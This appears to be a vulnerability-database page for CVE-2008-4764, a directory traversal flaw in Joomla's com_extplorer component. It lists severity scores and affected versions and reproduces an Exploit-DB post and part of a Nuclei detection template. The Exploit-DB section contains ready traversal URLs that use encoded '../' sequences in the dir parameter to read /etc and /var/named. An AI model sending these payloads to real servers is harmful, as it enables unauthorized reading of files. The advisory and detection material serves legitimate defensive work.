CVE-2008-4764
published 2008-10-28CVE-2008-4764: Directory traversal vulnerability in the eXtplorer module (com_extplorer) 2.0.0 RC2 and earlier in Joomla! allows remote attackers to read arbitrary files via…
PriorityP340medium5CVSS 2.0
AVNACLAuNCPINAN
EXPLOIT
EPSS
16.50%
96.6th percentile
Directory traversal vulnerability in the eXtplorer module (com_extplorer) 2.0.0 RC2 and earlier in Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the dir parameter in a show_error action.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| extplorer | com_extplorer | <= 2.0.0 | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Joomla! Component com_extplorer 2.0.0 RC2 - Local Directory Traversal
exploitdb·2008-04-13
CVE-2008-4764 Joomla! Component com_extplorer 2.0.0 RC2 - Local Directory Traversal
Joomla! Component com_extplorer 2.0.0 RC2 - Local Directory Traversal
---
----- H-T Team [ HouSSaMix + ToXiC350 ] from MoroCCo ---------------------------------------------------------
= Author : HouSSaMix
= Script : Joomla and Mambo Component com_extplorer
= version : target.com/path/index.php?option=com_extplorer&action=show_error&dir=../../[directory]
example :
site.com/joomla/index.php?option=com_extplorer&action=show_error&dir=..%2F..%2F..%2F%2F..%2F..%2Fetc
site.com/joomla/index.php?option=com_extplorer&action=show_error&dir=..%2F..%2F..%2F%2F..%2F..%2F%2Fvar%2Fnamed
= greetz : V4 Team - Jiki Team - Gold_M - HaCkeR_EgY - RoMaNcYxHaCkEr and all muslims Hackers
# milw0rm.com [2008-04-13]
Nuclei
Joomla! <=2.0.0 RC2 - Local File Inclusion
nuclei·CVSS 5.0
CVE-2008-4764 [MEDIUM] Joomla! <=2.0.0 RC2 - Local File Inclusion
Joomla! <=2.0.0 RC2 - Local File Inclusion
Joomla! 2.0.0 RC2 and earlier are susceptible to local file inclusion in the eXtplorer module (com_extplorer) that allows remote attackers to read arbitrary files via a .. (dot dot) in the dir parameter in a show_error action.
Template:
id: CVE-2008-4764
info:
name: Joomla! <=2.0.0 RC2 - Local File Inclusion
author: daffainfo
severity: medium
description: Joomla! 2.0.0 RC2 and earlier are susceptible to local file inclusion in the eXtplorer module (com_extplorer) that allows remote attackers to read arbitrary files via a .. (dot dot) in the dir parameter in a show_error action.
impact: |
Attackers can read sensitive files on the server, potentially leading to information disclosure.
remediation: |
Upgrade Joomla! to a version higher than 2.0.0
2008-10-28
Published